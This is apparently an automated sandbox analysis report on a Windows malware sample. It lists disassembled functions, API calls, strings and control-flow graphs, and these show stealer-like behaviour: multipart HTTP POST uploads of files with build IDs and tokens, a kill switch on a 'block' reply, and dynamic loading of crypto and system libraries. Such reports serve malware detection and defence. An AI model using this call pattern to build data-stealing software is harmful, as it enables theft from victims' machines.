                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                      • InternetConnectA.WININET ref: 00403290
                                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 004032CA
                                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 004032FA
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,Content-Disposition: form-data; name=",?,?,00421505,?,?,?), ref: 0040364A
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00403660
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040366C
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00403679
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040369B
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00411952,00000000), ref: 004036A2
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 004036BC
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00000014), ref: 004036C7
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 004036E1
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403703
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403708
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403739
                                                                                                                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040374F
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040375D
                                                                                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 004037A4
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 004037D6
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00403823
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403848
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403850
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00403859
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00403866
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$Internet$Heap$lstrcpy$Process$Httpmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackErrorExitFreeInfoLastOptionQuerySendSleep
                                                                                                                                                                                                                                                                                      • String ID: ------$"$--$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$block$build_id$file_data$file_name$https$token
                                                                                                                                                                                                                                                                                      • API String ID: 1851392271-2620489619
                                                                                                                                                                                                                                                                                      • Opcode ID: 4b79130a0f4ea3545f79df70e1b297391bfff2f976d9b237d9fafe9a9eb16a72
                                                                                                                                                                                                                                                                                      • Instruction ID: bceff4d112c07ef55503c2bfa5bbc07c75ab0ef13ec91c0f48555253a5be1088
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b79130a0f4ea3545f79df70e1b297391bfff2f976d9b237d9fafe9a9eb16a72
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A2263307105286BDB05BBA19C96AFF67699F84748F40006EF4066B281DFBC5EC687ED
                                                                                                                                                                                                                                                                                      Function 00403920 Relevance: 72.4, APIs: 30, Strings: 11, Instructions: 633networkmemorystringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1881 403920-4039d0 call 410200 call 402790 call 4101c0 * 5 call 410530 InternetOpenA StrCmpCA 1898 404010-404031 InternetCloseHandle call 410530 call 407790 1881->1898 1899 4039d6-403b13 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 1881->1899 1909 404081-404098 call 411250 * 2 call 410200 1898->1909 1910 404033-40407e call 410240 call 410340 call 410290 call 410230 GetProcessHeap HeapFree 1898->1910 1899->1898 1990 403b19-403b56 HttpOpenRequestA 1899->1990 1926 40409d-4040f6 call 410230 * 10 1909->1926 1910->1909 1991 404006-40400d InternetCloseHandle 1990->1991 1992 403b5c-403b61 1990->1992 1991->1898 1993 403b63-403b75 InternetSetOptionA 1992->1993 1994 403b7b-403e45 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 401390 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410530 lstrlenA call 410530 lstrlenA GetProcessHeap HeapAlloc 1992->1994 1993->1994 2139 403f35-403f5d InternetCloseHandle * 3 call 4101c0 1994->2139 2140 403e4b-403eb3 call 410530 * 2 lstrlenA memcpy call 410530 lstrlenA call 410530 * 2 lstrlenA memcpy 1994->2140 2139->1926 2153 403ec0-403ef4 call 410530 lstrlenA call 410530 2140->2153 2159 403f62-403f7e call 411250 GetProcessHeap HeapFree 2153->2159 2160 403ef6-403f09 Sleep 2153->2160 2166 403f80-403f9b InternetReadFile 2159->2166 2162 403f10-403f33 call 411250 GetProcessHeap HeapFree 2160->2162 2163 403f0b-403f0e 2160->2163 2162->2139 2162->2166 2163->2153 2163->2162 2168 403ff7-404003 InternetCloseHandle 2166->2168 2169 403f9d-403fa2 2166->2169 2168->1991 2169->2168 2170 403fa4-403fa7 2169->2170 2171 403fb0-403fee call 410340 call 410290 call 410230 InternetReadFile 2170->2171 2171->2168 2178 403ff0-403ff5 2171->2178 2178->2168 2178->2171
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                      • InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,Content-Disposition: form-data; name=",?,?,00421505), ref: 00403E15
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00403E28
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00403E34
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403E41
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00403E66
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00403E6B
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403E82
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA4
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00421505,?,?,?,?,00000014,?,?), ref: 00403EA9
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403ED9
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403EFD
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F22
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F2C
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00403F38
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00403F41
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00417786), ref: 00403F4A
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?,00000014), ref: 00403F74
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00421505,?,?,?,?), ref: 00403F7E
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000000C7,?), ref: 00403F93
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 00403FE6
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00403FFA
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404007
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404011
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,0042150A,00000000,?,?,?,?,?,?,?), ref: 0040406D
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040407C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                      • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$mode$token
                                                                                                                                                                                                                                                                                      • API String ID: 2829941862-3466435155
                                                                                                                                                                                                                                                                                      • Opcode ID: 861cb8dae58485ddebc8c38636aeaaa6a9d7a4680efb3a25b371246ffcd3b1fe
                                                                                                                                                                                                                                                                                      • Instruction ID: 5b37cdde6ef0ecb750ac5b7d415ead0f9e62264991208947704b3bc77561ae75
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 861cb8dae58485ddebc8c38636aeaaa6a9d7a4680efb3a25b371246ffcd3b1fe
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1312523171011867CB15BBA29C9AAFF6B6A9FC4704F40005EF4066B291DFBC5DC6C7A9
                                                                                                                                                                                                                                                                                      Function 00418610 Relevance: 70.2, APIs: 6, Strings: 34, Instructions: 150libraryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 2179 418610-418622 GetModuleHandleA 2180 4187e6-41883e LoadLibraryA * 5 2179->2180 2181 418628-4187e1 call 404df0 * 21 2179->2181 2182 418840-418850 call 404df0 2180->2182 2183 418855-418857 2180->2183 2181->2180 2182->2183 2186 418859-418879 call 404df0 * 2 2183->2186 2187 41887e-418885 2183->2187 2186->2187 2189 418897-41889e 2187->2189 2190 418887-418892 call 404df0 2187->2190 2195 4188b0-4188b7 2189->2195 2196 4188a0-4188ab call 404df0 2189->2196 2190->2189 2202 4188b9-4188d9 call 404df0 * 2 2195->2202 2203 4188de 2195->2203 2196->2195 2202->2203
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,004185CA), ref: 00418615
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 004187EB
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004187FB
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(user32.dll), ref: 0041880B
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(crypt32.dll), ref: 0041881B
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041882B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                      • String ID: CloseHandle$CreateDCA$CreateEventA$CryptStringToBinaryA$ExitProcess$GetComputerNameA$GetCurrentProcess$GetDeviceCaps$GetProcAddress$GetProcessHeap$GetSystemInfo$GetSystemTime$GetUserDefaultLangID$GetUserNameA$GlobalMemoryStatusEx$LoadLibraryA$NtQueryInformationProcess$OpenEventA$ReleaseDC$Sleep$SystemTimeToFileTime$VirtualAlloc$VirtualAllocExNuma$VirtualFree$advapi32.dll$crypt32.dll$gdi32.dll$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$ntdll.dll$sscanf$user32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2593893887-2466989068
                                                                                                                                                                                                                                                                                      • Opcode ID: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                                      • Instruction ID: fa4f152899c94b2b2f6a7a6abf1eb692faa9c8451fb2198c09e274f393329d92
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2951B4B0A45750AFD711AF25FD42B257AA3EB80705354203FB902A71F3DBBA5450AFE8
                                                                                                                                                                                                                                                                                      Function 0040D9C0 Relevance: 58.1, APIs: 18, Strings: 15, Instructions: 370registrystringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
